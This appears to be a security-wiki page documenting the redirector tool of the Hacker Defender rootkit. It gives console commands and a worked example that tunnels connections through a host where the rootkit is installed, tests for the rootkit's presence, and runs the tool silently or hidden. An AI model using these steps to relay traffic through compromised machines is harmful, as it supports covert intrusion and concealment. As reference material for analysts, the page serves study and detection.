Hacker-Defender-hxdef/rdrbs100-redirector

From aldeid
Jump to navigation Jump to search
You are here:
redirector

Description

Redirector is based on backdoor technology. First connection packets are same as in backdoor connection. That mean you use same ports as for backdoor. Next packets are special packets for redirector only. These packets are made by redirectors base which is run on users computer. First packet of redirected connection defines target server and port.

The redirectors base saves its settings into its inifile which name depends on base exefile name (so default is rdrbs100.ini). If this file doesn't exist when base is run, it is created automatically. It is better not to modify this inifile externaly. All settings can be changed from base console.

If we want to use redirector on server where rootkit is installed, we have to run redirectors base on localhost before. Then in base console we have to create mapped port routed to server with hxdef. Finally we can connect on localhost base on chosen port and transfering data. Redirected data are coded with rootkit password. In this version connection speed is limited with about 256 kBps. Redirector is not determined to be used for hispeed connections in this version. Redirector is also limited with system where rootkit run. Redirector works with TCP protocol only.

In this version the base is controled with 19 commands. These are not case sensitive. Their function is described in HELP command. During the base startup are executed commands in startup-list. Startup-list commands are edited with commands which start with SU.

Redirector differentiate between two connection types (HTTP and other). If connection is other type packets are not changed. If it is HTTP type Host parametr in HTTP header is changed to the target server. Maximum redirectors count on one base is 1000.

Redirector base fully works only on NT boxes. Only on NT program has tray icon and you can hide console with HIDE command. Only on NT base can be run in silent mode where it has no output, no icon and it does only commands in startup-list.

Examples

getting mapped port info

>MPINFO

No mapped ports in the list.

add command MPINFO to startup-list and get startup-list commands

>SUADD MPINFO
>sulist
0) MPINFO

using of HELP command

>HELP
Type HELP COMMAND for command details.
Valid commands are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL, 
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using HTTP type.
usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET 
SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]

add mapped port

we want to listen on localhost on port 100, rootkit is installed on server 200.100.2.36 on port 80, target server is www.google.com on port 80, rootkits password is bIgpWd, connection type is HTTP, ip address of target server (www.google.com) - we always have to know its ip - is 216.239.53.100:

>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

command ADD can be run without parameters, in this case we are asked for every parameter separately

check mapped ports again with MPINFO

>MPINFO

There are 1 mapped ports in the list. Currently 0 of them open.

enumeration of mapped port list

>LIST
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

detailed description of one mapped port

>DETAIL 0
Listening on port: 100
Mapping server address: 200.100.2.36
Mapping server port: 80
Target server address: 216.239.53.100
Target server port: 80
Password: bIgpWd
Port type: HTTP
Domain name for HTTP Host: www.google.com
Current state: CLOSED

test whether rootkit is installed

We can test whether the rootkit is installed without password on mapping server 200.100.2.36 (but this is not needed if we are sure about it):

>TEST 0
Testing 0) 200.100.2.36:80:bIgpWd - OK

if test failed it returns

Testing 0) 200.100.2.36:80:bIgpWd - FAILED

OPEN command

Port is still closed and before we can use it, we have to open it with OPEN command, we can close port with CLOSE command when it is open, we can use flag ALL when want to apply these commands on all ports in the list, current state after required action is written after a while:

>OPEN 0
Port number 0 opened.
>CLOSE 0
Port number 0 closed.

or

>OPEN ALL
Port number 0 opened.

Save current settings

To save current settings and lists we can use SAVE command, this saves all to inifile (saving is also done by command EXIT without DIS flag):

>SAVE
Saved successfully.

Open port is all what we need for data transfer. Now you can open your favourite explorer and type http://localhost:100/ as url. If no problems you will see how main page on www.google.com is loaded.

First packets of connection can be delayed up to 5 seconds, but others are limited only by speed of server, your internet connection speed and by redirector technology which is about 256 kBps in this version.

Comments